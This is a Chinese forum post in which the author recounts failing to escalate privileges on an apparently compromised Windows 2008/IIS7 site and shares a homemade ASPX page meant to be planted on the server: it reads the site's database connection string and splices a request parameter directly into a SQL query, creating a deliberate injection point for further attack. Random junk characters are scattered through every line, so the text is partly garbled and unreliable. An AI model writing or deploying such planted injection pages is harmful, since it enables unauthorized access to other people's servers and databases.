昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。* T. ~- V8 h/ d, ~- L
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。; H6 t( E0 r$ J+ w |2 f
代码量不多,自己写个拉倒了。烦死了。
$ r) L# i/ H( [" }' w! e5 f6 I7 R1 h2 |& C
7 z, z9 D$ L7 P! u3 D+ N
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">; l4 c% e% T$ G" i# o
<html xmlns="http://www.w3.org/1999/xhtml">/ M5 {+ J4 L6 n8 Q, E6 e) W
<head runat="server">
0 i3 C+ ]# m9 O <title>暗影aspx构造注射专用页面</title>
1 I7 \' I* y" }! @4 C</head>
3 c& T) |5 @3 q) V: R<body>7 l9 \5 Z/ E4 d$ D
<form id="form1" runat="server">0 C& Q( d$ D! T# d. D
<div>
# g+ x- A% m: r9 y <script language="c#" runat="server">- C2 F: i4 }7 p5 c, S! f- m
0 _; @9 |+ }3 h( O4 B: j void page_init(object sender, EventArgs e)
* a1 }3 R: M6 t- ]1 V: C* n {
- B1 P4 F" l" O& P) S 2 F0 K+ v' A" |- h% o: _5 G" H
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();1 i: y1 U/ ?8 [- [- i# U
5 \$ ?! e& d5 t3 t; Q: |& C# R conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
$ g, R, _9 B# w1 }( l; q conn.Open();& h% g" G4 G6 g7 E0 n
" U& y9 u, G% a: k5 F) }8 D
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1# y+ \$ Q2 J' t/ l2 d. t1 F' `
- T$ V' T' R+ ^8 \- v
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
: X! U6 P5 o' x2 R int x = command.ExecuteNonQuery();+ Q* p' r0 \! c" o( O
Response.Write(i+"\n");. t7 k& T1 G9 h5 f% {, d/ m" `/ a" o$ k
Response.Write(x);
4 g, @- ^; M' H conn.Close();2 F6 q8 R* v& w l& I
}. I2 x- g0 F8 D1 Q; h# ~2 Y7 {
- U# c3 _3 d6 j" E) @ </script>0 q: r/ F$ `" {3 k/ y1 e
</div>
" \7 Q0 U; @5 B1 { </form>
( m2 p! B2 i, r6 E</body>5 q5 \, S- x1 Q3 A! f5 g% A, d
</html>9 @9 h- e+ `8 J5 I$ i3 {6 g
|
发表于 2013-3-20 21:32:01
收藏
支持
反对